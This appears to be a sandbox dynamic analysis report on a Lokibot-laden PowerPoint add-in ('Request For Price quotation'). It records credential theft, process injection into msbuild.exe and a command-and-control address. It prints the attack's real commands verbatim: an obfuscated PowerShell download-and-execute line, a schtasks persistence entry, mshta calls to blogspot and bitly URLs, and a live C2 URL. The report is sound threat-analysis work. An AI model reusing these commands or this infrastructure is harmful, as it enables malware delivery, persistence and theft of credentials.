DYNAMIC ANALYSIS REPORT #1559276

Classifications: Injector Spyware Dropper

Verdict: MALICIOUS

Threat Names: Lokibot, C2/Generic-A, VBA:Amphitryon.217, VB:Trojan.Valyria.4726, Gen:Variant.Razy.762033

Verdict Reason: -

Sample Type Powerpoint Document

Sample Name Request For Price quotation 1-6-2021.ppam

ID #577786

MD5 e4c3f31ecdafcda0fa615fdedfcc0513

SHA1 8d06efd6912296dfed548a4c0afcef355ef0f15a

SHA256 a782285f1b9ee7ceef60c568aabd624f8082d76eaf900f53d020f581146928bf

File Size 8.71 KB

Report Created 2021-06-01 12:09 (UTC+2)

Target Environment win10_64_th2_en_mso2016 | ms_office

X-Ray Vision for Malware - www.vmray.com 1 / 50 DYNAMIC ANALYSIS REPORT #1559276

OVERVIEW

VMRay Threat Identifiers (33 rules, 89 matches)

Score Category Operation Count Classification

5/5 Injection Writes into the memory of another running process 1 Injector

• (Process #7) powershell.exe modifies memory of (process #13) msbuild.exe.

5/5 Injection Writes into the memory of a process running from a created or modified executable 2 -

• (Process #7) powershell.exe modifies memory of (process #14) msbuild.exe.

• (Process #7) powershell.exe modifies memory of (process #15) msbuild.exe.

5/5 Injection Modifies control flow of another process 1 -

• (Process #7) powershell.exe alters context of (process #13) msbuild.exe.

5/5 Injection Modifies control flow of a process running from a created or modified executable 2 -

• (Process #7) powershell.exe alters context of (process #14) msbuild.exe.

• (Process #7) powershell.exe alters context of (process #15) msbuild.exe.

5/5 YARA Malicious content matched by YARA rules 2 Spyware

• Rule "Lokibot" from ruleset "Malware" has matched on a memory dump for (process #13) msbuild.exe.

• Rule "Lokibot" from ruleset "Malware" has matched on the function strings for (process #13) msbuild.exe.

5/5 Data Collection Tries to read cached credentials of various applications 1 Spyware

• Tries to read sensitive data of: KiTTY, Internet Explorer / Edge, Trojita, SecureFX, Pidgin, FAR Manager, LinasFTP, WinChips, FileZilla, Internet Explorer, NCH Fling, QtWeb Internet Browser, Opera, IncrediMail, NCH Classic FTP, Pocomail, Total Commander, BlazeFTP, Bitvise SSH Client, FTP Navigator, PuTTY.

4/5 Network Connection Checks Internet connection 1 -

• (Process #2) mshta.exe checks network connectivity via API InternetGetConnectedState.

4/5 Execution Document tries to create process 4 -

• Document creates (process #2) mshta.exe.

• Document creates (process #13) msbuild.exe.

• Document creates (process #14) msbuild.exe.

• Document creates (process #15) msbuild.exe.

4/5 Obfuscation Reads from memory of another process 3 -

• (Process #7) powershell.exe reads from (process #13) msbuild.exe.

• (Process #7) powershell.exe reads from (process #14) msbuild.exe.

• (Process #7) powershell.exe reads from (process #15) msbuild.exe.

4/5 Discovery Reads installed applications 1 Spyware

• Reads installed programs by enumerating the registry key.

4/5 Antivirus Malicious content was detected by heuristic scan 4 -

• Built-in AV detected the embedded file ooo.bin as "VBA:Amphitryon.217".

• Built-in AV detected the sample itself as "VBA:Amphitryon.217".

• Built-in AV detected the modified file c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\44[1].htm as "VB:Trojan.Valyria.4726".

• Built-in AV detected a memory dump of (process #13) msbuild.exe as "Gen:Variant.Razy.762033".


4/5 Execution Executes dropped PE file 1 Dropper

• Executes dropped file "C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe".

4/5 Network Connection Performs DNS request 3 -

• (Process #7) powershell.exe resolves host name "ia801500.us.archive.org" to IP "207.241.228.150".

• (Process #13) msbuild.exe resolves host name "173.208.204.37" to IP "173.208.204.37".

• (Process #13) msbuild.exe resolves host name "[non-printable bytes, not recoverable from the report]" to IP "-".

4/5 Network Connection Connects to remote host 2 -

• (Process #7) powershell.exe opens an outgoing TCP connection to host "207.241.228.150:443".

• (Process #13) msbuild.exe opens an outgoing TCP connection to host "173.208.204.37:80".

4/5 Network Connection Attempts to connect through HTTP 2 -

• (Process #13) msbuild.exe failed to connect to "http://173.208.204.37/k.php/SczbkxCQZQyVr".

• (Process #11) mshta.exe failed to connect to "http://1230948%1230948@0v2x.blogspot.com/p/44.html".

4/5 Network Connection Attempts to connect through HTTPS 4 -

• (Process #2) mshta.exe connects to "https://1230948%1230948@bitly.com/awkdhikhasd".

• (Process #2) mshta.exe connects to "https://l0mx.blogspot.com/p/44.html".

• (Process #2) mshta.exe connects to "https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fl0mx.blogspot.com%2Fp%2F44.html&type=blog&bpli=1".

• (Process #11) mshta.exe connects to "https://0v2x.blogspot.com/p/44.html".

4/5 Reputation Contacts known malicious URL 1 -

• Reputation analysis labels the URL "http://173.208.204.37/k.php/SczbkxCQZQyVr" which was contacted by (process #13) msbuild.exe as "C2/Generic-A".

4/5 Reputation Contacts known malicious IP address 1 -

• Reputation analysis labels the contacted IP address 173.208.204.37 as "C2/Generic-A".

4/5 Task Scheduling Schedules task 1 -

• Schedules task for command ""MsHtA"", to be triggered by Time. Task has been rescheduled by the analyzer.

4/5 Task Scheduling Schedules task via schtasks 1 -

• Schedules task """SECOTAKSA""" via the schtasks command line utility.

3/5 Discovery Reads system data 3 -

• (Process #13) msbuild.exe reads the cryptographic machine GUID from registry.

• (Process #14) msbuild.exe reads the cryptographic machine GUID from registry.

• (Process #15) msbuild.exe reads the cryptographic machine GUID from registry.

3/5 Anti Analysis Delays execution 1 -

• (Process #13) msbuild.exe has a thread which sleeps more than 5 minutes.

2/5 Anti Analysis Tries to detect debugger 1 -

• (Process #2) mshta.exe tries to detect a debugger via API "IsDebuggerPresent".

2/5 Data Collection Reads sensitive browser data 5 -


• (Process #2) mshta.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.

• (Process #13) msbuild.exe tries to read sensitive data of web browser "QtWeb Internet Browser" by registry.

• (Process #13) msbuild.exe tries to read credentials of web browser "Internet Explorer" by reading from the system's credential vault.

• (Process #13) msbuild.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by registry.

• (Process #11) mshta.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.

2/5 Discovery Possibly does reconnaissance 14 -

• (Process #13) msbuild.exe tries to gather information about application "Mozilla Firefox" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Comodo IceDragon" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Safari" by registry.

• (Process #13) msbuild.exe tries to gather information about application "K-Meleon" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Mozilla SeaMonkey" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Mozilla Flock" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Cyberfox" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Total Commander" by registry.

• (Process #13) msbuild.exe tries to gather information about application "NetScape" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Default Programs" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Bitvise SSH Client" by registry.

• (Process #13) msbuild.exe tries to gather information about application "SecureFX" by registry.

• (Process #13) msbuild.exe tries to gather information about application "" by registry.

• (Process #13) msbuild.exe tries to gather information about application "Trojita" by registry.

2/5 Data Collection Reads sensitive application data 5 -

• (Process #13) msbuild.exe tries to read sensitive data of application "Pidgin" by file.

• (Process #13) msbuild.exe tries to read sensitive data of application "Bitvise SSH Client" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of application "KiTTY" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of application "PuTTY" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of application "WinChips" by registry.

2/5 Data Collection Reads sensitive ftp data 10 -

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "LinasFTP" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "FileZilla" by file.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "BlazeFTP" by file.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "BlazeFTP" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "Total Commander" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "FAR Manager" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "SecureFX" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "NCH Fling" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "NCH Classic FTP" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of ftp application "FTP Navigator" by file.

2/5 Data Collection Reads sensitive mail data 5 -

• (Process #13) msbuild.exe tries to read sensitive data of mail application "Pocomail" by file.

• (Process #13) msbuild.exe tries to read sensitive data of mail application "IncrediMail" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of mail application "" by file.

• (Process #13) msbuild.exe tries to read sensitive data of mail application "Microsoft Outlook" by registry.

• (Process #13) msbuild.exe tries to read sensitive data of mail application "Trojita" by registry.

2/5 Execution Office macro uses an execute function 1 -

• Office macro uses the run function.

2/5 Execution Executes macro on specific event 1 -


• Executes macro automatically on target "document" and event "open".

2/5 Execution Drops PE file 1 -

• Drops file C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe.

1/5 Mutex Creates mutex 3 -

• (Process #13) msbuild.exe creates mutex with name "B7274519EDDE9BDC8AE51348".

• (Process #14) msbuild.exe creates mutex with name "B7274519EDDE9BDC8AE51348".

• (Process #15) msbuild.exe creates mutex with name "B7274519EDDE9BDC8AE51348".

1/5 Execution Contains suspicious Office macro 1 -

• Office document contains a suspicious VBA macro.

- Trusted Known clean file 12 -

• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\cookienotice[1].js" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\281434096-static_pages[1].css" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\3101730221-analytics_autotrack[1].js" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\maia[1].css" is a known clean file.

• File "c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\icon18_wrench_allbkg[1].png" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT" is a known clean file.

• File "c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\q2ct0htu\body_gradient_tile_light[1].png" is a known clean file.

• File "c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\gradients_light[1].png" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.lck" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\error[1]" is a known clean file.

• File "c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1560258661-3990802383-1811730007-1000\3d3578a85286f88c6cd9d151e4412949_03845cb8-7441-4a2f-8c0f-c90408af5778" is a known clean file.

• File "C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe" is a known clean file.

Remarks

Anti-Sleep Triggered (0x0200000E): The overall sleep time of all monitored processes was truncated from "12 minutes, 12 seconds" to "20 seconds" to reveal dormant functionality.

Anti-Sleep Triggered (0x0200003A): A task was rescheduled ahead of time to reveal dormant functionality.


Mitre ATT&CK Matrix

Tactic: Techniques

Initial Access: -

Execution: #T1064 Scripting, #T1053 Scheduled Task

Persistence: #T1053 Scheduled Task

Privilege Escalation: #T1053 Scheduled Task

Defense Evasion: #T1064 Scripting

Credential Access: #T1081 Credentials in Files, #T1214 Credentials in Registry, #T1003 Credential Dumping

Discovery: #T1083 File and Directory Discovery, #T1049 System Network Connections Discovery, #T1082 System Information Discovery, #T1012 Query Registry, #T1217 Browser Bookmark Discovery

Lateral Movement: -

Collection: #T1119 Automated Collection, #T1005 Data from Local System

Command and Control: #T1071 Standard Application Layer Protocol, #T1032 Standard Cryptographic Protocol

Exfiltration: -

Impact: -


Sample Information

ID 1559276

MD5 e4c3f31ecdafcda0fa615fdedfcc0513

SHA1 8d06efd6912296dfed548a4c0afcef355ef0f15a

SHA256 a782285f1b9ee7ceef60c568aabd624f8082d76eaf900f53d020f581146928bf

SSDeep 192:ZMA2JFXorP5iWztBbksOzrh01pTUd6s7y:QJYhiEB4/V0XG6s+

ImpHash

Filename Request For Price quotation 1-6-2021.ppam

File Size 8.71 KB

Sample Type Powerpoint Document

Has Macros

Analysis Information

Creation Time 2021-06-01 12:09 (UTC+2)

Analysis Duration 00:04:11

Termination Reason Timeout

Number of Monitored Processes 9

Execution Successful False

Reputation Analysis Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 4

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 2

Screenshots truncated.

NETWORK

General

10.75 KB total sent

1049.08 KB total received

2 ports 80, 443

8 contacted IP addresses

71 URLs extracted

5 files downloaded

0 malicious hosts detected

DNS

31 DNS requests for 7 domains

1 nameservers contacted

12 total requests returned errors

HTTP/S

7 URLs contacted, 4 servers

23 sessions, 10.32 KB sent, 1048.93 KB received

DNS Requests

Type | Hostname | Response Code | Resolved IPs | CNames | Verdict

A | bitly.com | NoError | 67.199.248.14, 67.199.248.15 | | N/A

A | l0mx.blogspot.com, blogspot.l.googleusercontent.com | NoError | 142.250.186.129 | blogspot.l.googleusercontent.com | N/A

A | fonts.googleapis.com | NoError | 142.250.186.138 | | N/A

A | ia801500.us.archive.org | NoError | 207.241.228.150 | | N/A

A | 0v2x.blogspot.com, blogspot.l.googleusercontent.com | NoError | 142.250.186.129 | blogspot.l.googleusercontent.com | N/A

| 173.208.204.37 | | 173.208.204.37 | | N/A

| [non-printable host name, not recoverable from the report] | | | | N/A

HTTP Requests

Method | URL | Response Size | Verdict

- | http://1230948%1230948@0v2x.blogspot.com/p/44.html\ | 0 bytes | N/A

- | http://1230948%1230948@0v2x.blogspot.com/p/44.html | 0 bytes | N/A

POST | http://173.208.204.37/k.php/SczbkxCQZQyVr | 0 bytes | N/A

GET | http://0v2x.blogspot.com/p/44.html | 0 bytes | N/A

GET | http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral | 0 bytes | N/A

GET | //fonts.googleapis.com/css?family=Open+Sans:300 | 0 bytes | N/A

GET | //www.google.com/css/maia.css | 0 bytes | N/A

GET | //www.blogger.com/content.g | 0 bytes | N/A

- | https://1230948%1230948@bitly.com/awkdhikhasd | 0 bytes | N/A

- | https://ia801500.us.archive.org/0/items/1_20210527_20210527/1.txt | 0 bytes | N/A

GET | https://0v2x.blogspot.com/p/44.html | 0 bytes | N/A

GET | https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css | 0 bytes | N/A

GET | https://l0mx.blogspot.com/favicon.ico | 0 bytes | N/A

GET | https://l0mx.blogspot.com/p/44.html | 0 bytes | N/A

GET | https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4338430458218760041&zx=7daa74e6-a63d-414d-b329-4c3a73b1266b | 0 bytes | N/A

GET | https://l0mx.blogspot.com/ | 0 bytes | N/A

GET | https://www.blogger.com | 0 bytes | N/A

GET | https://www.blogger.com/blogin.g?blogspotURL=https://l0mx.blogspot.com/p/44.html&type=blog | 0 bytes | N/A

GET | https://resources.blogblog.com/img/icon18_wrench_allbkg.png | 0 bytes | N/A

GET | https://www.blogger.com/static/v1/widgets/4154767893-widgets.js | 0 bytes | N/A

GET | https://www.blogger.com/static/v1/v-css/281434096-static_pages.css | 0 bytes | N/A

GET | https://www.google.de/intl/de/about/products?tab=jh | 0 bytes | N/A

GET | https://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app | 0 bytes | N/A

GET | https://www.google.de/webhp?tab=jw | 0 bytes | N/A

GET | https://maps.google.de/maps?hl=de&tab=jl | 0 bytes | N/A

GET | https://www.youtube.com/?gl=DE&tab=j1 | 0 bytes | N/A

GET | https://play.google.com/?hl=de&tab=j8 | 0 bytes | N/A

GET | https://news.google.com/?tab=jn | 0 bytes | N/A

GET | https://mail.google.com/mail/?tab=jm | 0 bytes | N/A

GET | https://meet.google.com/?hs=197 | 0 bytes | N/A

GET | https://chat.google.com/ | 0 bytes | N/A

GET | https://contacts.google.com/?hl=de&tab=jC | 0 bytes | N/A

GET | https://drive.google.com/?tab=jo | 0 bytes | N/A

GET | https://calendar.google.com/calendar?tab=jc | 0 bytes | N/A

GET | https://translate.google.de/?hl=de&tab=jT | 0 bytes | N/A

GET | https://photos.google.com/?tab=jq&pageId=none | 0 bytes | N/A

GET | https://duo.google.com/?usp=duo_ald | 0 bytes | N/A

GET | https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO | 0 bytes | N/A

GET | https://www.google.de/shopping?hl=de&source=og&tab=jf | 0 bytes | N/A

GET | https://docs.google.com/document/?usp=docs_alc | 0 bytes | N/A

GET | https://docs.google.com/spreadsheets/?usp=sheets_alc | 0 bytes | N/A

GET | https://docs.google.com/presentation/?usp=slides_alc | 0 bytes | N/A

GET | https://books.google.de/?hl=de&tab=jp | 0 bytes | N/A

GET | https://www.blogger.com/?tab=jj | 0 bytes | N/A

GET | https://hangouts.google.com/ | 0 bytes | N/A

GET | https://keep.google.com/ | 0 bytes | N/A

GET | https://jamboard.google.com/?usp=jam_ald | 0 bytes | N/A

GET | https://earth.google.com/web/ | 0 bytes | N/A

GET | https://www.google.de/save | 0 bytes | N/A

GET | https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral | 0 bytes | N/A

GET | https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2 | 0 bytes | N/A

GET | https://podcasts.google.com/ | 0 bytes | N/A

GET | https://stadia.google.com/ | 0 bytes | N/A

GET | https://www.google.com/travel/?dest_src=al | 0 bytes | N/A

GET | https://docs.google.com/forms/?usp=forms_alc | 0 bytes | N/A

GET | https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg | 0 bytes | N/A

GET | https://l0mx.blogspot.com/p/44.html?interstitial=ABqL8_gvbPXHD5jpqumPTlQCtBQgp8XaSPp4fUgU9ZuwTwjaS0cE_SN8DFw00XdM | 0 bytes | N/A

GET | https://www.blogger.com/go/helpcenter | 0 bytes | N/A

GET | https://www.blogger.com/go/discuss | 0 bytes | N/A

GET | https://www.blogger.com/go/tutorials | 0 bytes | N/A

GET | https://www.blogger.com/go/buzz | 0 bytes | N/A

GET | https://www.blogger.com/go/devapi | 0 bytes | N/A

GET | https://www.blogger.com/go/devforum | 0 bytes | N/A

GET | https://www.blogger.com/go/terms | 0 bytes | N/A

GET | https://www.blogger.com/go/privacy | 0 bytes | N/A

GET | https://www.blogger.com/go/contentpolicy | 0 bytes | N/A

GET | https://www.google.de/contact/impressum.html | 0 bytes | N/A

GET | https://www.google-analytics.com/analytics.js | 0 bytes | N/A

GET | https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js | 0 bytes | N/A

GET | https://0v2x.blogspot.com/favicon.ico | 0 bytes | N/A

GET | https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1599313125304121436&zx=631e10cf-0d71-470c-af57-797d37f6668c | 0 bytes | N/A

GET | https://0v2x.blogspot.com/ | 0 bytes | N/A

GET | https://www.blogger.com/blogin.g?blogspotURL=https://0v2x.blogspot.com/p/44.html&type=blog | 0 bytes | N/A

GET | https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fl0mx.blogspot.com%2Fp%2F44.html&type=blog&bpli=1 | 0 bytes | N/A


BEHAVIOR

Process Graph

#1 powerpnt.exe (Sample Start)
    Child Process -> #2 mshta.exe
        Child Process -> #7 powershell.exe
            Child Process, Modify Memory, Modify Control Flow -> #13 msbuild.exe
            Child Process, Modify Memory, Modify Control Flow -> #14 msbuild.exe
            Child Process, Modify Memory, Modify Control Flow -> #15 msbuild.exe
        Child Process -> #9 schtasks.exe

#3 svchost.exe (RPC Server)
    Child Process -> #11 mshta.exe


Process #1: powerpnt.exe

ID 1

Filename c:\program files (x86)\microsoft office\root\office16\powerpnt.exe

Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE"

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 103724, Reason: Analysis Target

Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout

Monitor Duration 252.34s

Return Code Unknown

PID 4604

Parent PID 2104

Bitness 32 Bit

Host Behavior

Type Count

Module 3

Keyboard 6


Process #2: mshta.exe

ID 2

Filename c:\windows\syswow64\mshta.exe

Command Line C:\Windows\SysWOW64\mshta.exe https://1230948%1230948@bitly.com/awkdhikhasd

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 145650, Reason: Child Process

Unmonitor End Time End Time: 313171, Reason: Terminated

Monitor Duration 167.52s

Return Code 0

PID 4640

Parent PID 4604

Bitness 32 Bit

Dropped Files (9)

Filename | File Size | SHA256 | YARA Match

- | 475 bytes | d172d750493be64a7ed84dec1dd2a0d787ba42f78bc694b0858f152c52b6620b |

C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT | 47.97 KB | b1313dd95eaf63f33f86f72f09e2ecd700d11159a8693210c37470fcb84038f7 |

- | 95 bytes | 0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd |

- | 403 bytes | ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044 |

- | 147.90 KB | efea3840519cec6828835e879cb29cf9c45d7f45a8e920852b9ee2129bcfeb95 |

- | 1.13 KB | cbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7 |

C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\error[1] | 3.17 KB | 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754 |

- | 98 bytes | 82f8ca6d30d6f9c3263743cfe1e15f47a4c268d464a7c18bc6b69dd97e12fb57 |

- | 195 bytes | 4c3ea140e5dafcf0a6714eb5d4b0991e6385466db3e47d2f3712dd6e5a2e281d |

Host Behavior

Type Count

Module 212

System 5607

Registry 14

Environment 4

- 3

- 10

Keyboard 9

File 71

Window 28

COM 55


- 29

Process 1

Mutex 2

- 1

Network Behavior

Type Count

HTTPS 4

TCP 4


Process #3: svchost.exe

ID 3

Filename c:\windows\system32\svchost.exe

Command Line C:\Windows\system32\svchost.exe -k netsvcs

Initial Working Directory C:\Windows\system32\

Monitor Start Time Start Time: 171788, Reason: RPC Server

Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout

Monitor Duration 184.28s

Return Code Unknown

PID 828

Parent PID 540

Bitness 64 Bit


Process #7: powershell.exe

ID 7

Filename c:\windows\syswow64\windowspowershell\v1.0\powershell.exe

Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia801500.us.archive.org/0/items/1_20210527_202...... /0/items/1_20210527_20210527/1.txt') -useB);i'E'x(iwr('https://ia801500.us.archive.org/0/items/1_20210527_20210527/1.txt') -useB);

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 182349, Reason: Child Process

Unmonitor End Time End Time: 342044, Reason: Terminated

Monitor Duration 159.69s

Return Code 0

PID 4188

Parent PID 4640

Bitness 32 Bit

Host Behavior

Type Count

Module 10

File 520

Environment 59

Registry 59

Process 3

Mutex 2

- 37

System 17

- 9

- 24

Network Behavior

Type Count

DNS 1

TCP 3


Process #9: schtasks.exe

ID 9

Filename c:\windows\syswow64\schtasks.exe

Command Line "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%1230948@0v2x.blogspot.com/p/44.html\""

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 183491, Reason: Child Process

Unmonitor End Time End Time: 201474, Reason: Terminated

Monitor Duration 17.98s

Return Code 0

PID 112

Parent PID 4640

Bitness 32 Bit

Host Behavior

Type Count

Module 3

System 3

COM 1

File 6


Process #11: mshta.exe

ID 11

Filename c:\windows\system32\mshta.exe

Command Line MsHtA "http://1230948%1230948@0v2x.blogspot.com/p/44.html"

Initial Working Directory C:\Windows\system32\

Monitor Start Time Start Time: 206144, Reason: Child Process

Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout

Monitor Duration 149.92s

Return Code Unknown

PID 1420

Parent PID 828

Bitness 64 Bit

Host Behavior

Type Count

System 849

Environment 1

- 2

Registry 6

Module 84

- 5

Keyboard 3

File 13

Window 6

COM 3

- 14

Network Behavior

Type Count

HTTP 2

HTTPS 1

TCP 1


Process #13: msbuild.exe

ID 13

Filename c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe

Command Line #cmd

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 312428, Reason: Child Process

Unmonitor End Time End Time: 356065, Reason: Terminated by Timeout

Monitor Duration 43.64s

Return Code Unknown

PID 4908

Parent PID 4188

Bitness 32 Bit

Injection Information (7)

Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x400000(4194304) | 0x400 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x401000(4198400) | 0x13800 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x415000(4280320) | 0x4200 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x41a000(4300800) | 0x200 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x4a0000(4849664) | 0x2000 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x3c4008(3948552) | 0x4 | 1

Modify Control Flow | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 / 0x1318 | - | | 1

Dropped Files (5)

Filename | File Size | SHA256 | YARA Match

- | 53 bytes | e641ff8107a4197ded9f558d1891e716811e9a7f109f14e876f5a8394844dc34 |

C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.hdb | 4 bytes | 859ffdca62ee0971821a4b2dedfc023d0f9a021391b5ac336ddb49d53d28330e |

C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.lck | 1 bytes | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |

- | 53 bytes | 353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f812e7594cf2ec5ca1175785b50 |

C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe | 254.30 KB | 2c75ad03937eee1046942d48b0fdc366e908dc00a5defc8f3b9513c7821a78b8 |


Host Behavior

Type Count

Module 1324

Registry 181

Mutex 1

File 292

System 41

User 9

Network Behavior

Type Count

HTTP 14

DNS 26

TCP 15


Process #14: msbuild.exe

ID 14

Filename c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe

Command Line #cmd

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 332549, Reason: Child Process

Unmonitor End Time End Time: 334199, Reason: Terminated

Monitor Duration 1.65s

Return Code 0

PID 4104

Parent PID 4188

Bitness 32 Bit

Injection Information (6)

Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x400000(4194304) | 0x400 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x401000(4198400) | 0x13800 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x415000(4280320) | 0x4200 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x41a000(4300800) | 0x200 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x4a0000(4849664) | 0x2000 | 1

Modify Control Flow | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 / 0x10d4 | - | | 1

Host Behavior

Type Count

Module 14

Registry 2

Mutex 1


Process #15: msbuild.exe

ID 15

Filename c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe

Command Line #cmd

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 339819, Reason: Child Process

Unmonitor End Time End Time: 341822, Reason: Terminated

Monitor Duration 2.00s

Return Code 0

PID 1740

Parent PID 4188

Bitness 32 Bit

Injection Information (7)

Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x400000(4194304) | 0x400 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x401000(4198400) | 0x13800 | 1

